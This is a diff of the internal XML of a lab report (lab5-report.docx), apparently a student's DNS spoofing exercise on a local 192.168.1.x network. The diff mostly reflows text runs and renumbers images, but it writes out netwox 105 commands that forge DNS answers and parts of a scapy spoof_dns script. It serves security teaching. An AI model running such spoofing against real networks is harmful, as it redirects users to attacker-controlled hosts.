--- a/lab5-report.docx
+++ b/lab5-report.docx
@@ -37,7 +37,13 @@
         <w:t>5</w:t>
       </w:r>
       <w:r>
-        <w:t>7117132</w:t>
+        <w:t>7117</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>224</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -71,33 +77,45 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>UserMachine</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
+        <w:t>UserMachine(IP):</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>1</w:t>
+      </w:r>
+      <w:r>
+        <w:t>92.168.1.106</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>IP):</w:t>
+        <w:t>LocalDNSServer(IP):</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -112,7 +130,7 @@
         <w:t>1</w:t>
       </w:r>
       <w:r>
-        <w:t>92.168.1.106</w:t>
+        <w:t>92.168.1.107</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -123,75 +141,13 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
           <w:sz w:val="26"/>
           <w:szCs w:val="26"/>
         </w:rPr>
-        <w:t>LocalDNSServer</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>IP):</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>1</w:t>
-      </w:r>
-      <w:r>
-        <w:t>92.168.1.107</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-      </w:pPr>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>Attacker(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-          <w:sz w:val="26"/>
-          <w:szCs w:val="26"/>
-        </w:rPr>
-        <w:t>IP):</w:t>
+        <w:t>Attacker(IP):</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -282,7 +238,7 @@
                     </pic:cNvPicPr>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId5">
+                    <a:blip r:embed="rId7">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -368,7 +324,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId6">
+                    <a:blip r:embed="rId8">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -489,7 +445,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId7">
+                    <a:blip r:embed="rId9">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -563,7 +519,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId8"/>
+                    <a:blip r:embed="rId10"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -610,21 +566,7 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>，使用</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>wireshark</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>抓包</w:t>
+        <w:t>，使用wireshark抓包</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -650,7 +592,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId9">
+                    <a:blip r:embed="rId11">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -725,7 +667,6 @@
         </w:rPr>
         <w:t>地址，在</w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -734,7 +675,6 @@
         </w:rPr>
         <w:t>wireshark</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
@@ -892,7 +832,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId10"/>
+                    <a:blip r:embed="rId12"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -949,7 +889,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId11"/>
+                    <a:blip r:embed="rId13"/>
                     <a:stretch>
                       <a:fillRect/>
                     </a:stretch>
@@ -1015,7 +955,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId12">
+                    <a:blip r:embed="rId14">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1120,7 +1060,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId13">
+                    <a:blip r:embed="rId15">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1169,7 +1109,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId14">
+                    <a:blip r:embed="rId16">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1239,16 +1179,8 @@
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>修改用户机的/</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>etc</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>修改用户机的/etc</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:eastAsiaTheme="minorHAnsi"/>
@@ -1302,7 +1234,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId15">
+                    <a:blip r:embed="rId17">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1400,7 +1332,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId16">
+                    <a:blip r:embed="rId18">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1438,53 +1370,18 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>使用</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>netwox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>伪造应答</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>sudo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netwox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 105 -h "www.example.net" -H "1.2.3.4" -a "ns.atta</w:t>
+        <w:t>使用netwox伪造应答</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:r>
+        <w:t>sudo netwox 105 -h "www.example.net" -H "1.2.3.4" -a "ns.atta</w:t>
       </w:r>
       <w:r>
         <w:t>ck</w:t>
       </w:r>
       <w:r>
-        <w:t>.com" -A "1.2.3.4" -f "</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> host 192.168.1.106"</w:t>
+        <w:t>.com" -A "1.2.3.4" -f "src host 192.168.1.106"</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1528,7 +1425,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId17">
+                    <a:blip r:embed="rId19">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1599,67 +1496,26 @@
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>清除</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>清除DNScache，</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>DNScache</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>使用netwox工具</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
-        <w:t>，</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>使用</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>netwox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
-        <w:t>工具</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
         <w:t>s</w:t>
       </w:r>
       <w:r>
-        <w:t>udo</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:t>netwox</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:t xml:space="preserve"> 105 -h </w:t>
-      </w:r>
-      <w:hyperlink r:id="rId18" w:history="1">
+        <w:t xml:space="preserve">udo netwox 105 -h </w:t>
+      </w:r>
+      <w:hyperlink r:id="rId20" w:history="1">
         <w:r>
           <w:rPr>
             <w:rStyle w:val="a3"/>
@@ -1758,7 +1614,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill rotWithShape="1">
-                    <a:blip r:embed="rId19">
+                    <a:blip r:embed="rId21">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1821,7 +1677,7 @@
                     <pic:cNvPicPr/>
                   </pic:nvPicPr>
                   <pic:blipFill>
-                    <a:blip r:embed="rId20">
+                    <a:blip r:embed="rId22">
                       <a:extLst>
                         <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                           <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
@@ -1951,29 +1807,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t> </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>scapy.all</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> </w:t>
+        <w:t> scapy.all </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2030,7 +1864,6 @@
         </w:rPr>
         <w:t> </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2041,7 +1874,6 @@
         </w:rPr>
         <w:t>spoof_dns</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2097,7 +1929,6 @@
         </w:rPr>
         <w:t>    </w:t>
       </w:r>
-      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2116,18 +1947,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNS </w:t>
+        <w:t>(DNS </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2167,18 +1987,7 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t> ‘</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>example.net’</w:t>
+        <w:t> ‘example.net’</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -2190,38 +1999,15 @@
         </w:rPr>
         <w:t>in</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> pkt[DNS].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>qd.qname</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>):</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t> pkt[DNS].qd.qname):</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2246,43 +2032,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>IPpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>IP(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        IPpkt = IP(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2293,82 +2044,35 @@
         </w:rPr>
         <w:t>dst</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=pkt[IP].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=pkt[IP].src, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="9CDCFE"/>
           <w:kern w:val="0"/>
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
         <w:t>src</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>, </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="9CDCFE"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>src</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>=pkt[IP].</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>dst</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>)</w:t>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
+          <w:color w:val="D4D4D4"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="21"/>
+          <w:szCs w:val="21"/>
+        </w:rPr>
+        <w:t>=pkt[IP].dst)</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -2393,43 +2097,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>UDPpkt</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t> = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>UDP(</w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        UDPpkt = UDP(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2440,7 +2109,6 @@
         </w:rPr>
         <w:t>dport</w:t>
       </w:r>
-      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2514,20 +2182,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        Anssec = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNSRR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        Anssec = DNSRR(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2651,20 +2307,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        NSsec = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
-          <w:color w:val="D4D4D4"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="21"/>
-          <w:szCs w:val="21"/>
-        </w:rPr>
-        <w:t>DNSRR(</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+        <w:t>        NSsec = DNSRR(</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:eastAsia="宋体" w:hAnsi="Consolas" w:cs="宋体"/>
@@ -2788,20 +2432,8 @@
           <w:sz w:val="21"/>
           <w:szCs w:val="21"/>
         </w:rPr>
-        <w:t>        Addsec = </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
